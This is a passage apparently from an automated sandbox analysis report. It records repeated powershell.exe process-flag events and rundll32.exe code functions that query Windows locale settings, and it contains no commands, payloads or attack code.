Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
2_2_6E18C3CB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E18C643 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E18C68E |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E18C729 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
2_2_6E18C7B6 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E18CC36 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
2_2_6E1834FA |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
2_2_6E18CD03 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E18C59A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E18CA06 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
2_2_6E18CB2F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
2_2_6E183961 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, |
3_2_6E141E8A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
3_2_6E18C3CB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E18C643 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E18C68E |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E18C729 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: EnumSystemLocalesW, |
3_2_6E1834FA |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
3_2_6E18CD03 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
3_2_6E18CB2F |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: GetLocaleInfoW, |
3_2_6E183961 |